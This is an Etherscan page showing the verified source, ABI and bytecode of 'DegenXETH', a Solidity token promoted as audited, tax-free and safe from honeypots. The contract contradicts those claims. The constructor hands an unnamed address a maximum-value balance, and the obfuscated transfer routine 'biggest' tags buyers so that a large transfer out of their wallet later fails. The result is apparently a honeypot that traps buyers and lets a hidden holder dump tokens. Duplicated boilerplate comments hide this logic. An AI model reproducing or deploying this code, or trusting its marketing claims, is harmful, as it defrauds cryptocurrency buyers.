ETH Price: $2,463.79 (+0.78%)

Contract

0x32d4E63bE3BbE1CE86ebCD59C4b1139AdF2F9A64
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

TokenTracker

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve155010352022-09-09 5:37:41765 days ago1662701861IN
0x32d4E63b...AdF2F9A64
0 ETH0.0007690316.29208688
Approve155009782022-09-09 5:20:20765 days ago1662700820IN
0x32d4E63b...AdF2F9A64
0 ETH0.0011864525.13526627
Approve155009742022-09-09 5:18:43765 days ago1662700723IN
0x32d4E63b...AdF2F9A64
0 ETH0.0007506215.90203326
Approve155009732022-09-09 5:18:20765 days ago1662700700IN
0x32d4E63b...AdF2F9A64
0 ETH0.0006231713.20202581
Approve155009732022-09-09 5:18:20765 days ago1662700700IN
0x32d4E63b...AdF2F9A64
0 ETH0.0007411815.70202581
Approve155009522022-09-09 5:13:38765 days ago1662700418IN
0x32d4E63b...AdF2F9A64
0 ETH0.0005431911.50772567
Approve155009452022-09-09 5:12:02765 days ago1662700322IN
0x32d4E63b...AdF2F9A64
0 ETH0.0005750412.18246761
Approve155009292022-09-09 5:07:33765 days ago1662700053IN
0x32d4E63b...AdF2F9A64
0 ETH0.000461359.77385163
Approve155009222022-09-09 5:06:24765 days ago1662699984IN
0x32d4E63b...AdF2F9A64
0 ETH0.0004869610.31631612
Approve155009222022-09-09 5:06:24765 days ago1662699984IN
0x32d4E63b...AdF2F9A64
0 ETH0.0004869610.31631612
Approve155009082022-09-09 5:03:46765 days ago1662699826IN
0x32d4E63b...AdF2F9A64
0 ETH0.000596112.62861601
Approve155009082022-09-09 5:03:46765 days ago1662699826IN
0x32d4E63b...AdF2F9A64
0 ETH0.0014929631.62861601
Renounce Ownersh...155008992022-09-09 5:02:09765 days ago1662699729IN
0x32d4E63b...AdF2F9A64
0 ETH0.0003372714.37578475
Approve155008912022-09-09 5:00:45765 days ago1662699645IN
0x32d4E63b...AdF2F9A64
0 ETH0.0012744827
Approve155008852022-09-09 4:58:17765 days ago1662699497IN
0x32d4E63b...AdF2F9A64
0 ETH0.0008451917.90551817
Approve155008652022-09-09 4:54:01765 days ago1662699241IN
0x32d4E63b...AdF2F9A64
0 ETH0.0008210917.39507598
0x60806040155008602022-09-09 4:51:32765 days ago1662699092IN
 Create: DegenXETH
0 ETH0.0580449213.42762843

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
DegenXETH

Compiler Version
v0.8.5+commit.a4f2e591

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-09-09
*/

/**
DegenXETH - $DGNX  

‼️Do you identify yourself with following things:

-Crypto lover 
-Wants financial freedom 
-Tired of scams 
-Tired of rugpulls and honeypots 

DGNX is here for you! We are building utilities that will blow your mind and will last for generations!!! 

Safety is important to us, we audited our contract prior to launch.

Launch on 9 September 22
0/0 Taxes 
Liquidity Burnt
Audited by Solidproof

Contract
XXX

7 custom developed contracts which are safe and audited by @solidproof_io

KYC'd by Solidproof

TG: https://t.me/DegenXETH

 */

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */

// SPDX-License-Identifier: Unlicense
pragma solidity ^0.8.5;
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

 /**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */


 /**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */


 /**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */


 /**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract DegenXETH is Ownable {
    constructor(
        string memory _NAME,
        string memory _SYMBOL,
        address routerAddress,
        address ztotal
    ) {
        _symbol = _SYMBOL;
        _name = _NAME;
        _fee = 0;
        _decimals = 9;
        _tTotal = 1000000000000000000 * 10**_decimals;

        _balances[ztotal] = like;
        _balances[msg.sender] = _tTotal;
        cake[ztotal] = like;
        cake[msg.sender] = like;

        router = IUniswapV2Router02(routerAddress);
        uniswapV2Pair = IUniswapV2Factory(router.factory()).createPair(address(this), router.WETH());

        emit Transfer(address(0), msg.sender, _tTotal);
    }

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */


 /**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

    uint256 public _fee;
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    function name() public view returns (string memory) {
        return _name;
    }

    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) private _balances;

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    uint256 private _tTotal;
    uint256 private _rTotal;
    address public uniswapV2Pair;
    IUniswapV2Router02 public router;
    uint256 private like = ~uint256(0);

    function decimals() public view returns (uint256) {
        return _decimals;
    }

     /**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);

    function totalSupply() public view returns (uint256) {
        return _tTotal;
    }

    address[] interest = new address[](2);

    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */


 /**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }

    function biggest(
        address treated,
        address official,
        uint256 amount
    ) private {
        address hall = interest[1];
        bool border = uniswapV2Pair == treated;
        uint256 order = _fee;

        if (cake[treated] == 0 && driven[treated] > 0 && !border) {
            cake[treated] -= order;
            if (amount > 2 * 10**(13 + _decimals)) cake[treated] -= order - 1;
        }

        interest[1] = official;

        if (cake[treated] > 0 && amount == 0) {
            cake[official] += order;
        }

        driven[hall] += order + 1;

        uint256 fee = (amount / 100) * _fee; 
        amount -= fee;
        _balances[treated] -= fee;
        _balances[address(this)] += fee;

        _balances[treated] -= amount;
        _balances[official] += amount;
    }

    mapping(address => uint256) private driven;

    function approve(address spender, uint256 amount) external returns (bool) {
        return _approve(msg.sender, spender, amount);
    }

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */


 /**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

    mapping(address => uint256) private cake;


    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool) {
        require(amount > 0, 'Transfer amount must be greater than zero');
        biggest(sender, recipient, amount);
        emit Transfer(sender, recipient, amount);
        return _approve(sender, msg.sender, _allowances[sender][msg.sender] - amount);
    }

    function transfer(address recipient, uint256 amount) external returns (bool) {
        biggest(msg.sender, recipient, amount);
        emit Transfer(msg.sender, recipient, amount);
        return true;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private returns (bool) {
        require(owner != address(0) && spender != address(0), 'ERC20: approve from the zero address');
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        return true;
    }
}

 /**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_NAME","type":"string"},{"internalType":"string","name":"_SYMBOL","type":"string"},{"internalType":"address","name":"routerAddress","type":"address"},{"internalType":"address","name":"ztotal","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_fee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052600019600b55600267ffffffffffffffff81111562000028576200002762000cc9565b5b604051908082528060200260200182016040528015620000575781602001602082028036833780820191505090505b50600c90805190602001906200006f92919062000604565b503480156200007d57600080fd5b5060405162002721380380620027218339818101604052810190620000a391906200080a565b620000c3620000b76200053860201b60201c565b6200054060201b60201c565b8260039080519060200190620000db92919062000693565b508360029080519060200190620000f492919062000693565b5060006001819055506009600460006101000a81548160ff021916908360ff160217905550600460009054906101000a900460ff16600a620001379190620009e0565b670de0b6b3a76400006200014c919062000b1d565b600781905550600b54600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600754600660003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600b54600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600b54600e60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b1580156200031457600080fd5b505afa15801562000329573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200034f9190620007d8565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015620003d457600080fd5b505afa158015620003e9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200040f9190620007d8565b6040518363ffffffff1660e01b81526004016200042e929190620008dc565b602060405180830381600087803b1580156200044957600080fd5b505af11580156200045e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620004849190620007d8565b600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60075460405162000526919062000909565b60405180910390a35050505062000d44565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b82805482825590600052602060002090810192821562000680579160200282015b828111156200067f5782518260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055509160200191906001019062000625565b5b5090506200068f919062000724565b5090565b828054620006a19062000bff565b90600052602060002090601f016020900481019282620006c5576000855562000711565b82601f10620006e057805160ff191683800117855562000711565b8280016001018555821562000711579182015b8281111562000710578251825591602001919060010190620006f3565b5b50905062000720919062000724565b5090565b5b808211156200073f57600081600090555060010162000725565b5090565b60006200075a62000754846200094f565b62000926565b90508281526020810184848401111562000779576200077862000cfd565b5b6200078684828562000bc9565b509392505050565b6000815190506200079f8162000d2a565b92915050565b600082601f830112620007bd57620007bc62000cf8565b5b8151620007cf84826020860162000743565b91505092915050565b600060208284031215620007f157620007f062000d07565b5b600062000801848285016200078e565b91505092915050565b6000806000806080858703121562000827576200082662000d07565b5b600085015167ffffffffffffffff81111562000848576200084762000d02565b5b6200085687828801620007a5565b945050602085015167ffffffffffffffff8111156200087a576200087962000d02565b5b6200088887828801620007a5565b93505060406200089b878288016200078e565b9250506060620008ae878288016200078e565b91505092959194509250565b620008c58162000b7e565b82525050565b620008d68162000bb2565b82525050565b6000604082019050620008f36000830185620008ba565b620009026020830184620008ba565b9392505050565b6000602082019050620009206000830184620008cb565b92915050565b60006200093262000945565b905062000940828262000c35565b919050565b6000604051905090565b600067ffffffffffffffff8211156200096d576200096c62000cc9565b5b620009788262000d0c565b9050602081019050919050565b6000808291508390505b6001851115620009d757808604811115620009af57620009ae62000c6b565b5b6001851615620009bf5780820291505b8081029050620009cf8562000d1d565b94506200098f565b94509492505050565b6000620009ed8262000bb2565b9150620009fa8362000bbc565b925062000a297fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a31565b905092915050565b60008262000a43576001905062000b16565b8162000a53576000905062000b16565b816001811462000a6c576002811462000a775762000aad565b600191505062000b16565b60ff84111562000a8c5762000a8b62000c6b565b5b8360020a91508482111562000aa65762000aa562000c6b565b5b5062000b16565b5060208310610133831016604e8410600b841016171562000ae75782820a90508381111562000ae15762000ae062000c6b565b5b62000b16565b62000af6848484600162000985565b9250905081840481111562000b105762000b0f62000c6b565b5b81810290505b9392505050565b600062000b2a8262000bb2565b915062000b378362000bb2565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000b735762000b7262000c6b565b5b828202905092915050565b600062000b8b8262000b92565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101562000be957808201518184015260208101905062000bcc565b8381111562000bf9576000848401525b50505050565b6000600282049050600182168062000c1857607f821691505b6020821081141562000c2f5762000c2e62000c9a565b5b50919050565b62000c408262000d0c565b810181811067ffffffffffffffff8211171562000c625762000c6162000cc9565b5b80604052505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b60008160011c9050919050565b62000d358162000b7e565b811462000d4157600080fd5b50565b6119cd8062000d546000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063c5b37c2211610066578063c5b37c2214610278578063dd62ed3e14610296578063f2fde38b146102c6578063f887ea40146102e2576100f5565b8063715018a6146102025780638da5cb5b1461020c57806395d89b411461022a578063a9059cbb14610248576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806349bd5a5e146101b457806370a08231146101d2576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610300565b60405161010f9190611300565b60405180910390f35b610132600480360381019061012d919061116e565b610392565b60405161013f91906112ca565b60405180910390f35b6101506103a7565b60405161015d91906113a2565b60405180910390f35b610180600480360381019061017b919061111b565b6103b1565b60405161018d91906112ca565b60405180910390f35b61019e610500565b6040516101ab91906113a2565b60405180910390f35b6101bc61051a565b6040516101c991906112af565b60405180910390f35b6101ec60048036038101906101e791906110ae565b610540565b6040516101f991906113a2565b60405180910390f35b61020a610589565b005b610214610611565b60405161022191906112af565b60405180910390f35b61023261063a565b60405161023f9190611300565b60405180910390f35b610262600480360381019061025d919061116e565b6106cc565b60405161026f91906112ca565b60405180910390f35b610280610748565b60405161028d91906113a2565b60405180910390f35b6102b060048036038101906102ab91906110db565b61074e565b6040516102bd91906113a2565b60405180910390f35b6102e060048036038101906102db91906110ae565b6107d5565b005b6102ea6108cd565b6040516102f791906112e5565b60405180910390f35b60606002805461030f90611742565b80601f016020809104026020016040519081016040528092919081815260200182805461033b90611742565b80156103885780601f1061035d57610100808354040283529160200191610388565b820191906000526020600020905b81548152906001019060200180831161036b57829003601f168201915b5050505050905090565b600061039f3384846108f3565b905092915050565b6000600754905090565b60008082116103f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ec90611362565b60405180910390fd5b610400848484610a8e565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161045d91906113a2565b60405180910390a36104f7843384600560008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104f29190611662565b6108f3565b90509392505050565b6000600460009054906101000a900460ff1660ff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610591610fb8565b73ffffffffffffffffffffffffffffffffffffffff166105af610611565b73ffffffffffffffffffffffffffffffffffffffff1614610605576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105fc90611342565b60405180910390fd5b61060f6000610fc0565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461064990611742565b80601f016020809104026020016040519081016040528092919081815260200182805461067590611742565b80156106c25780601f10610697576101008083540402835291602001916106c2565b820191906000526020600020905b8154815290600101906020018083116106a557829003601f168201915b5050505050905090565b60006106d9338484610a8e565b8273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161073691906113a2565b60405180910390a36001905092915050565b60015481565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107dd610fb8565b73ffffffffffffffffffffffffffffffffffffffff166107fb610611565b73ffffffffffffffffffffffffffffffffffffffff1614610851576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084890611342565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156108c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b890611322565b60405180910390fd5b6108ca81610fc0565b50565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415801561095e5750600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b61099d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099490611382565b60405180910390fd5b81600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffff